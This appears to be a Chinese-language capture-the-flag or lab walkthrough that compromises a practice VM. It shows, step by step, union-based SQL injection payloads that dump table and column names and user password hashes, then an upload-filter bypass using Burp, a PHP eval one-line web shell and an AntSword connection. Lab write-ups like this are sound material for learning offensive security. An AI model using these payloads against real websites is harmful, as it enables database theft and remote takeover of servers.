查看nat模式子网地址,靶机需要也设置成nat模式
kali使用root用户用nmap去扫描全网段查看靶机的mac地址
找到了靶机相关信息
dirsearch扫描目录
dirsearch -u 192.168.229.188 |
进入ip
先注册一个账号密码 admin/123456
登录进去
在搜索框输入%
输入Linux OS 并判断闭合方式
输入
Linux OS' order by 3# |
Linux OS' order by 4# |
显示结果,说明闭合方式是' |
并且字段数是3 |
查看回显位置
-1 |
' union select 1,2,database()# |
查看表
-1' union select concat(table_name),2,3 from information_schema.tables where |
table_schema=database()# |
查看字段
-1' union select concat(column_name),2,3 from information_schema.columns where table_schema=database() and table_name="users"#
字段值
-1 |
' union select id,user,pasword from users# |
去解码一下密码
5d41402abc4b2a76b9719d911017c592
登录第一个用户
平平无奇
接着登录superadmin
哦豁,发现上传点
先上传一个文件🐎
bp抓包,修改后缀
上传成功
打开/upload/phpinfo1.php文件
写个一句话木马
<?php @eval($_POST[shell]);?> |
上传成功
打开文件
蚁剑连接